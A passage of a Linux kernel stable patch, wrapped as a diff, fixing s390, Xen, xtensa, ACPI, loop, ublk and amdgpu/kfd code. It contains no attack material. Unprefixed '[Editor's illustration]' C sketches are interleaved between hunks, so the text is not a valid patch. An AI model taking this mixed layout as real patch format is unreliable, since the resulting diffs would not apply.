+index b3235ab0ace83..ed646c583e4fe 100644
+--- a/arch/s390/Makefile
++++ b/arch/s390/Makefile
+@@ -162,7 +162,7 @@ vdso_prepare: prepare0
+ 
+ ifdef CONFIG_EXPOLINE_EXTERN
+ modules_prepare: expoline_prepare
+-expoline_prepare:
++expoline_prepare: scripts
+ 	$(Q)$(MAKE) $(build)=arch/s390/lib/expoline arch/s390/lib/expoline/expoline.o
+ endif
+ endif
+diff --git a/arch/s390/lib/uaccess.c b/arch/s390/lib/uaccess.c
+index 720036fb19242..d44214072779e 100644
+--- a/arch/s390/lib/uaccess.c
++++ b/arch/s390/lib/uaccess.c
+@@ -172,7 +172,7 @@ unsigned long __clear_user(void __user *to, unsigned long size)
+ 		"4: slgr  %0,%0\n"
+ 		"5:\n"
+ 		EX_TABLE(0b,2b) EX_TABLE(6b,2b) EX_TABLE(3b,5b) EX_TABLE(7b,5b)
+-		: "+a" (size), "+a" (to), "+a" (tmp1), "=a" (tmp2)
++		: "+&a" (size), "+&a" (to), "+a" (tmp1), "=&a" (tmp2)
+ 		: "a" (empty_zero_page), [spec] "d" (spec.val)
+ 		: "cc", "memory", "0");
+ 	return size;
+diff --git a/arch/x86/xen/Makefile b/arch/x86/xen/Makefile
+index 3c5b52fbe4a7f..a9ec8c9f5c5dd 100644
+--- a/arch/x86/xen/Makefile
++++ b/arch/x86/xen/Makefile
+@@ -45,6 +45,6 @@ obj-$(CONFIG_PARAVIRT_SPINLOCKS)+= spinlock.o
+ 
+ obj-$(CONFIG_XEN_DEBUG_FS)	+= debugfs.o
+ 
+-obj-$(CONFIG_XEN_PV_DOM0)	+= vga.o
++obj-$(CONFIG_XEN_DOM0)		+= vga.o
+ 
+ obj-$(CONFIG_XEN_EFI)		+= efi.o
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 8944726255c9c..333539bdbdaae 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -1389,7 +1389,8 @@ asmlinkage __visible void __init xen_start_kernel(struct start_info *si)
+ 
+ 		x86_platform.set_legacy_features =
+ 				xen_dom0_set_legacy_features;
+-		xen_init_vga(info, xen_start_info->console.dom0.info_size);
++		xen_init_vga(info, xen_start_info->console.dom0.info_size,
++			     &boot_params.screen_info);
+ 		xen_start_info->console.domU.mfn = 0;
+ 		xen_start_info->console.domU.evtchn = 0;
+ 
+diff --git a/arch/x86/xen/enlighten_pvh.c b/arch/x86/xen/enlighten_pvh.c
+index bcae606bbc5cf..ada3868c02c23 100644
+--- a/arch/x86/xen/enlighten_pvh.c
++++ b/arch/x86/xen/enlighten_pvh.c
+@@ -43,6 +43,19 @@ void __init xen_pvh_init(struct boot_params *boot_params)
+ 	x86_init.oem.banner = xen_banner;
+ 
+ 	xen_efi_init(boot_params);
++
++	if (xen_initial_domain()) {
++		struct xen_platform_op op = {
++			.cmd = XENPF_get_dom0_console,
++		};
++		int ret = HYPERVISOR_platform_op(&op);
++
++		if (ret > 0)
++			xen_init_vga(&op.u.dom0_console,
++				     min(ret * sizeof(char),
++					 sizeof(op.u.dom0_console)),
++				     &boot_params->screen_info);
++	}
+ }
+ 
+ void __init mem_map_via_hcall(struct boot_params *boot_params_p)
+diff --git a/arch/x86/xen/vga.c b/arch/x86/xen/vga.c
+index 14ea32e734d59..d97adab8420f4 100644
+--- a/arch/x86/xen/vga.c
++++ b/arch/x86/xen/vga.c
+@@ -9,10 +9,9 @@
+ 
+ #include "xen-ops.h"
+ 
+-void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size)
++void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size,
++			 struct screen_info *screen_info)
+ {
+-	struct screen_info *screen_info = &boot_params.screen_info;
+-
+ 	/* This is drawn from a dump from vgacon:startup in
+ 	 * standard Linux. */
+ 	screen_info->orig_video_mode = 3;
+diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
+index 9a8bb972193d8..a10903785a338 100644
+--- a/arch/x86/xen/xen-ops.h
++++ b/arch/x86/xen/xen-ops.h
+@@ -108,11 +108,12 @@ static inline void xen_uninit_lock_cpu(int cpu)
+ 
+ struct dom0_vga_console_info;
+ 
+-#ifdef CONFIG_XEN_PV_DOM0
+-void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size);
++#ifdef CONFIG_XEN_DOM0
++void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size,
++			 struct screen_info *);
+ #else
+ static inline void __init xen_init_vga(const struct dom0_vga_console_info *info,
+-				       size_t size)
++				       size_t size, struct screen_info *si)
+ {
+ }
+ #endif
+diff --git a/arch/xtensa/kernel/traps.c b/arch/xtensa/kernel/traps.c
+index 0c25e035ff107..9e9ade20a7ce4 100644
+--- a/arch/xtensa/kernel/traps.c
++++ b/arch/xtensa/kernel/traps.c
+@@ -541,7 +541,7 @@ static size_t kstack_depth_to_print = CONFIG_PRINT_STACK_DEPTH;
+ 
+ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ {
+-	size_t len;
++	size_t len, off = 0;
+ 
+ 	if (!sp)
+ 		sp = stack_pointer(task);
+@@ -550,9 +550,17 @@ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ 		  kstack_depth_to_print * STACK_DUMP_ENTRY_SIZE);
+ 
+ 	printk("%sStack:\n", loglvl);
+-	print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
+-		       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
+-		       sp, len, false);
++	while (off < len) {
++		u8 line[STACK_DUMP_LINE_SIZE];
++		size_t line_len = len - off > STACK_DUMP_LINE_SIZE ?
++			STACK_DUMP_LINE_SIZE : len - off;
++
++		__memcpy(line, (u8 *)sp + off, line_len);
++		print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
++			       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
++			       line, line_len, false);
++		off += STACK_DUMP_LINE_SIZE;
++	}
+ 	show_trace(task, sp, loglvl);
+ }
+ 
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index d466c81953146..3b6146b1e25cc 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -456,85 +456,67 @@ out_free:
+                              Notification Handling
+    -------------------------------------------------------------------------- */
+ 
+-/*
+- * acpi_bus_notify
+- * ---------------
+- * Callback for all 'system-level' device notifications (values 0x00-0x7F).
++/**
++ * acpi_bus_notify - Global system-level (0x00-0x7F) notifications handler
++ * @handle: Target ACPI object.
++ * @type: Notification type.
++ * @data: Ignored.
++ *
++ * This only handles notifications related to device hotplug.
+  */
+ static void acpi_bus_notify(acpi_handle handle, u32 type, void *data)
+ {
+ 	struct acpi_device *adev;
+-	u32 ost_code = ACPI_OST_SC_NON_SPECIFIC_FAILURE;
+-	bool hotplug_event = false;
+ 
+ 	switch (type) {
+ 	case ACPI_NOTIFY_BUS_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_BUS_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_WAKE:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_WAKE event\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_EJECT_REQUEST:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_EJECT_REQUEST event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK_LIGHT:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK_LIGHT event\n");
+ 		/* TBD: Exactly what does 'light' mean? */
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_FREQUENCY_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a frequency mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_BUS_MODE_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a bus mode mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_POWER_FAULT:
+ 		acpi_handle_err(handle, "Device has suffered a power fault\n");
+-		break;
++		return;
+ 
+ 	default:
+ 		acpi_handle_debug(handle, "Unknown event type 0x%x\n", type);
+-		break;
++		return;
+ 	}
+ 
+ 	adev = acpi_get_acpi_dev(handle);
+-	if (!adev)
+-		goto err;
+-
+-	if (adev->dev.driver) {
+-		struct acpi_driver *driver = to_acpi_driver(adev->dev.driver);
+-
+-		if (driver && driver->ops.notify &&
+-		    (driver->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS))
+-			driver->ops.notify(adev, type);
+-	}
+-
+-	if (!hotplug_event) {
+-		acpi_put_acpi_dev(adev);
+-		return;
+-	}
+ 
+-	if (ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
++	if (adev && ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
+ 		return;
+ 
+ 	acpi_put_acpi_dev(adev);
+ 
+- err:
+-	acpi_evaluate_ost(handle, type, ost_code, NULL);
++	acpi_evaluate_ost(handle, type, ACPI_OST_SC_NON_SPECIFIC_FAILURE, NULL);
+ }
+ 
+ static void acpi_notify_device(acpi_handle handle, u32 event, void *data)
+@@ -559,42 +541,51 @@ static u32 acpi_device_fixed_event(void *data)
+ 	return ACPI_INTERRUPT_HANDLED;
+ }
+ 
+-static int acpi_device_install_notify_handler(struct acpi_device *device)
++static int acpi_device_install_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+ 	acpi_status status;
+ 
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else
+-		status = acpi_install_notify_handler(device->handle,
+-						     ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		status = acpi_install_notify_handler(device->handle, type,
+ 						     acpi_notify_device,
+ 						     device);
++	}
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return -EINVAL;
+ 	return 0;
+ }
+ 
+-static void acpi_device_remove_notify_handler(struct acpi_device *device)
++static void acpi_device_remove_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						acpi_device_fixed_event);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						acpi_device_fixed_event);
+-	else
+-		acpi_remove_notify_handler(device->handle, ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
++	}
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+@@ -1036,7 +1027,7 @@ static int acpi_device_probe(struct device *dev)
+ 		 acpi_drv->name, acpi_dev->pnp.bus_id);
+ 
+ 	if (acpi_drv->ops.notify) {
+-		ret = acpi_device_install_notify_handler(acpi_dev);
++		ret = acpi_device_install_notify_handler(acpi_dev, acpi_drv);
+ 		if (ret) {
+ 			if (acpi_drv->ops.remove)
+ 				acpi_drv->ops.remove(acpi_dev);
+@@ -1059,7 +1050,7 @@ static void acpi_device_remove(struct device *dev)
+ 	struct acpi_driver *acpi_drv = to_acpi_driver(dev->driver);
+ 
+ 	if (acpi_drv->ops.notify)
+-		acpi_device_remove_notify_handler(acpi_dev);
++		acpi_device_remove_notify_handler(acpi_dev, acpi_drv);
+ 
+ 	if (acpi_drv->ops.remove)
+ 		acpi_drv->ops.remove(acpi_dev);
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 7f0ed845cd6ad..f06b3d3556710 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -714,6 +714,13 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Dell G15 5515"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 15 3535"),
++		},
++	},
+ 
+ 	/*
+ 	 * Desktops which falsely report a backlight and which our heuristics
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 793ae876918ce..426d0b42685a0 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1010,9 +1010,6 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	/* This is safe, since we have a reference from open(). */
+ 	__module_get(THIS_MODULE);
+ 
+-	/* suppress uevents while reconfiguring the device */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
+-
+ 	/*
+ 	 * If we don't hold exclusive handle for the device, upgrade to it
+ 	 * here to avoid changing device under exclusive owner.
+@@ -1067,6 +1064,9 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 		}
+ 	}
+ 
++	/* suppress uevents while reconfiguring the device */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
++
+ 	disk_force_media_change(lo->lo_disk, DISK_EVENT_MEDIA_CHANGE);
+ 	set_disk_ro(lo->lo_disk, (lo->lo_flags & LO_FLAGS_READ_ONLY) != 0);
+ 
+@@ -1109,17 +1109,17 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	if (partscan)
+ 		clear_bit(GD_SUPPRESS_PART_SCAN, &lo->lo_disk->state);
+ 
++	/* enable and uncork uevent now that we are done */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
++
+ 	loop_global_unlock(lo, is_loop);
+ 	if (partscan)
+ 		loop_reread_partitions(lo);
++
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(bdev, loop_configure);
+ 
+-	error = 0;
+-done:
+-	/* enable and uncork uevent now that we are done */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
+-	return error;
++	return 0;
+ 
+ out_unlock:
+ 	loop_global_unlock(lo, is_loop);
+@@ -1130,7 +1130,7 @@ out_putf:
+ 	fput(file);
+ 	/* This is safe: open() is still holding a reference. */
+ 	module_put(THIS_MODULE);
+-	goto done;
++	return error;
+ }
+ 
+ static void __loop_clr_fd(struct loop_device *lo, bool release)
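
[Editor's illustration] The loop_configure() hunks above narrow the uevent-suppression window: early failures now return before suppression is ever enabled, and the uncork happens before the lock is dropped, which is what let the patch delete the done: label. A minimal userspace sketch of that bracketing, with hypothetical stand-ins for dev_set_uevent_suppress() and the reconfiguration work:

#include <stdio.h>
#include <stdbool.h>

/* Hypothetical stand-in for dev_set_uevent_suppress(). */
static bool uevent_suppressed;

static void set_uevent_suppress(bool on)
{
	uevent_suppressed = on;
	printf("uevents %s\n", on ? "suppressed" : "enabled");
}

static int validate(int arg)     { return arg < 0 ? -1 : 0; }
static void reconfigure(int arg) { printf("reconfigure(%d)\n", arg); }

static int configure(int arg)
{
	int err = validate(arg);

	if (err)
		return err;	/* nothing suppressed yet: no uncork needed */

	/* Suppress only around the work that would emit spurious events. */
	set_uevent_suppress(true);
	reconfigure(arg);
	set_uevent_suppress(false);
	return 0;
}

int main(void)
{
	configure(-1);	/* early failure: suppression never toggled */
	configure(42);	/* full path: suppress, reconfigure, uncork */
	return 0;
}
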
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 4aec9be0ab77e..22a790d512842 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -656,7 +656,8 @@ static void __ublk_fail_req(struct ublk_queue *ubq, struct ublk_io *io,
+ 	}
+ }
+ 
+-static void ubq_complete_io_cmd(struct ublk_io *io, int res)
++static void ubq_complete_io_cmd(struct ublk_io *io, int res,
++				unsigned issue_flags)
+ {
+ 	/* mark this cmd owned by ublksrv */
+ 	io->flags |= UBLK_IO_FLAG_OWNED_BY_SRV;
+@@ -668,7 +669,7 @@ static void ubq_complete_io_cmd(struct ublk_io *io, int res)
+ 	io->flags &= ~UBLK_IO_FLAG_ACTIVE;
+ 
+ 	/* tell ublksrv one io request is coming */
+-	io_uring_cmd_done(io->cmd, res, 0);
++	io_uring_cmd_done(io->cmd, res, 0, issue_flags);
+ }
+ 
+ #define UBLK_REQUEUE_DELAY_MS	3
+@@ -685,7 +686,8 @@ static inline void __ublk_abort_rq(struct ublk_queue *ubq,
+ 	mod_delayed_work(system_wq, &ubq->dev->monitor_work, 0);
+ }
+ 
+-static inline void __ublk_rq_task_work(struct request *req)
++static inline void __ublk_rq_task_work(struct request *req,
++				       unsigned issue_flags)
+ {
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
+ 	int tag = req->tag;
+@@ -723,7 +725,7 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			pr_devel("%s: need get data. op %d, qid %d tag %d io_flags %x\n",
+ 					__func__, io->cmd->cmd_op, ubq->q_id,
+ 					req->tag, io->flags);
+-			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA);
++			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA, issue_flags);
+ 			return;
+ 		}
+ 		/*
+@@ -761,17 +763,18 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			mapped_bytes >> 9;
+ 	}
+ 
+-	ubq_complete_io_cmd(io, UBLK_IO_RES_OK);
++	ubq_complete_io_cmd(io, UBLK_IO_RES_OK, issue_flags);
+ }
+ 
+-static inline void ublk_forward_io_cmds(struct ublk_queue *ubq)
++static inline void ublk_forward_io_cmds(struct ublk_queue *ubq,
++					unsigned issue_flags)
+ {
+ 	struct llist_node *io_cmds = llist_del_all(&ubq->io_cmds);
+ 	struct ublk_rq_data *data, *tmp;
+ 
+ 	io_cmds = llist_reverse_order(io_cmds);
+ 	llist_for_each_entry_safe(data, tmp, io_cmds, node)
+-		__ublk_rq_task_work(blk_mq_rq_from_pdu(data));
++		__ublk_rq_task_work(blk_mq_rq_from_pdu(data), issue_flags);
+ }
+ 
+ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+@@ -783,12 +786,12 @@ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+ 		__ublk_abort_rq(ubq, blk_mq_rq_from_pdu(data));
+ }
+ 
+-static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd)
++static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
+ {
+ 	struct ublk_uring_cmd_pdu *pdu = ublk_get_uring_cmd_pdu(cmd);
+ 	struct ublk_queue *ubq = pdu->ubq;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_rq_task_work_fn(struct callback_head *work)
+@@ -797,8 +800,9 @@ static void ublk_rq_task_work_fn(struct callback_head *work)
+ 			struct ublk_rq_data, work);
+ 	struct request *req = blk_mq_rq_from_pdu(data);
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
++	unsigned issue_flags = IO_URING_F_UNLOCKED;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_queue_cmd(struct ublk_queue *ubq, struct request *rq)
+@@ -1052,7 +1056,8 @@ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+ 		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0);
++			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0,
++						IO_URING_F_UNLOCKED);
+ 	}
+ 
+ 	/* all io commands are canceled */
+@@ -1295,7 +1300,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ 
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: complete: cmd op %d, tag %d ret %x io_flags %x\n",
+ 			__func__, cmd_op, tag, ret, io->flags);
+ 	return -EIOCBQUEUED;
+@@ -2053,7 +2058,7 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 		break;
+ 	}
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: cmd done ret %d cmd_op %x, dev id %d qid %d\n",
+ 			__func__, ret, cmd->cmd_op, header->dev_id, header->queue_id);
+ 	return -EIOCBQUEUED;
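
[Editor's illustration] These ublk hunks exist because io_uring_cmd_done() grew an issue_flags argument: the driver must say whether it completes from the submission context (ring locked) or from task work and cancel paths (IO_URING_F_UNLOCKED). A rough userspace sketch of threading a flags value through helpers rather than assuming a context; all names here are hypothetical:

#include <stdio.h>

#define F_UNLOCKED 0x1	/* stand-in for IO_URING_F_UNLOCKED */

/* The completion helper behaves differently depending on whether the
 * caller already holds the ring lock, so the flag must be threaded
 * through every intermediate helper instead of being assumed. */
static void cmd_done(int res, unsigned issue_flags)
{
	if (issue_flags & F_UNLOCKED)
		printf("complete res=%d (must take lock ourselves)\n", res);
	else
		printf("complete res=%d (caller holds lock)\n", res);
}

static void forward_io(unsigned issue_flags)
{
	cmd_done(0, issue_flags);	/* propagate, never hardcode */
}

int main(void)
{
	forward_io(0);			/* from the submission path */
	forward_io(F_UNLOCKED);		/* from task work / cancel */
	return 0;
}
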
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index 435d81d6ffd9b..a78e80f9f65cd 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -981,7 +981,12 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+  */
+ bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+ {
+-	if (adev->flags & AMD_IS_APU)
++	if ((adev->flags & AMD_IS_APU) &&
++	    adev->gfx.imu.funcs) /* No need to do mode2 reset for IMU-enabled APUs */
++		return false;
++
++	if ((adev->flags & AMD_IS_APU) &&
++	    amdgpu_acpi_is_s3_active(adev))
+ 		return false;
+ 
+ 	if (amdgpu_sriov_vf(adev))
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index f79b8e964140e..e191d38f3da62 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1298,14 +1298,14 @@ static int kfd_ioctl_map_memory_to_gpu(struct file *filep,
+ 		args->n_success = i+1;
+ 	}
+ 
+-	mutex_unlock(&p->mutex);
+-
+ 	err = amdgpu_amdkfd_gpuvm_sync_memory(dev->adev, (struct kgd_mem *) mem, true);
+ 	if (err) {
+ 		pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 		goto sync_memory_failed;
+ 	}
+ 
++	mutex_unlock(&p->mutex);
++
+ 	/* Flush TLBs after waiting for the page table updates to complete */
+ 	for (i = 0; i < args->n_devices; i++) {
+ 		peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1321,9 +1321,9 @@ get_process_device_data_failed:
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ map_memory_to_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 
+ 	return err;
+@@ -1337,6 +1337,7 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 	void *mem;
+ 	long err = 0;
+ 	uint32_t *devices_arr = NULL, i;
++	bool flush_tlb;
+ 
+ 	if (!args->n_devices) {
+ 		pr_debug("Device IDs array empty\n");
+@@ -1389,16 +1390,19 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 		}
+ 		args->n_success = i+1;
+ 	}
+-	mutex_unlock(&p->mutex);
+ 
+-	if (kfd_flush_tlb_after_unmap(pdd->dev)) {
++	flush_tlb = kfd_flush_tlb_after_unmap(pdd->dev);
++	if (flush_tlb) {
+ 		err = amdgpu_amdkfd_gpuvm_sync_memory(pdd->dev->adev,
+ 				(struct kgd_mem *) mem, true);
+ 		if (err) {
+ 			pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 			goto sync_memory_failed;
+ 		}
++	}
++	mutex_unlock(&p->mutex);
+ 
++	if (flush_tlb) {
+ 		/* Flush TLBs after waiting for the page table updates to complete */
+ 		for (i = 0; i < args->n_devices; i++) {
+ 			peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1414,9 +1418,9 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ unmap_memory_from_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 	return err;
+ }
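
[Editor's illustration] Both kfd_chardev.c hunks move the sync under p->mutex and retarget the sync_memory_failed label so every failure path unlocks exactly once. A tiny runnable sketch of that single-unlock goto layout, with hypothetical stand-ins for the map and sync steps:

#include <stdio.h>
#include <pthread.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static int do_map(void)      { return 0; }
static int sync_memory(void) { return -1; /* simulate failure */ }

static int ioctl_map(void)
{
	int err;

	pthread_mutex_lock(&lock);

	err = do_map();
	if (err)
		goto out_unlock;

	/* Sync while still holding the lock; on failure fall through
	 * to the shared unlock instead of unlocking twice. */
	err = sync_memory();
	if (err)
		goto out_unlock;

	pthread_mutex_unlock(&lock);
	printf("mapped and synced\n");
	return 0;

out_unlock:
	pthread_mutex_unlock(&lock);
	printf("failed: %d\n", err);
	return err;
}

int main(void)
{
	return ioctl_map() ? 1 : 0;
}
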
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+index 22b077ac9a196..88bf6221d4bef 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+@@ -295,7 +295,7 @@ static unsigned long svm_migrate_unsuccessful_pages(struct migrate_vma *migrate)
+ static int
+ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			 struct migrate_vma *migrate, struct dma_fence **mfence,
+-			 dma_addr_t *scratch)
++			 dma_addr_t *scratch, uint64_t ttm_res_offset)
+ {
+ 	uint64_t npages = migrate->npages;
+ 	struct device *dev = adev->dev;
+@@ -305,19 +305,13 @@ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	uint64_t i, j;
+ 	int r;
+ 
+-	pr_debug("svms 0x%p [0x%lx 0x%lx]\n", prange->svms, prange->start,
+-		 prange->last);
++	pr_debug("svms 0x%p [0x%lx 0x%lx 0x%llx]\n", prange->svms, prange->start,
++		 prange->last, ttm_res_offset);
+ 
+ 	src = scratch;
+ 	dst = (uint64_t *)(scratch + npages);
+ 
+-	r = svm_range_vram_node_new(adev, prange, true);
+-	if (r) {
+-		dev_dbg(adev->dev, "fail %d to alloc vram\n", r);
+-		goto out;
+-	}
+-
+-	amdgpu_res_first(prange->ttm_res, prange->offset << PAGE_SHIFT,
++	amdgpu_res_first(prange->ttm_res, ttm_res_offset,
+ 			 npages << PAGE_SHIFT, &cursor);
+ 	for (i = j = 0; i < npages; i++) {
+ 		struct page *spage;
+@@ -397,14 +391,14 @@ out_free_vram_pages:
+ 		migrate->dst[i + 3] = 0;
+ 	}
+ #endif
+-out:
++
+ 	return r;
+ }
+ 
+ static long
+ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			struct vm_area_struct *vma, uint64_t start,
+-			uint64_t end, uint32_t trigger)
++			uint64_t end, uint32_t trigger, uint64_t ttm_res_offset)
+ {
+ 	struct kfd_process *p = container_of(prange->svms, struct kfd_process, svms);
+ 	uint64_t npages = (end - start) >> PAGE_SHIFT;
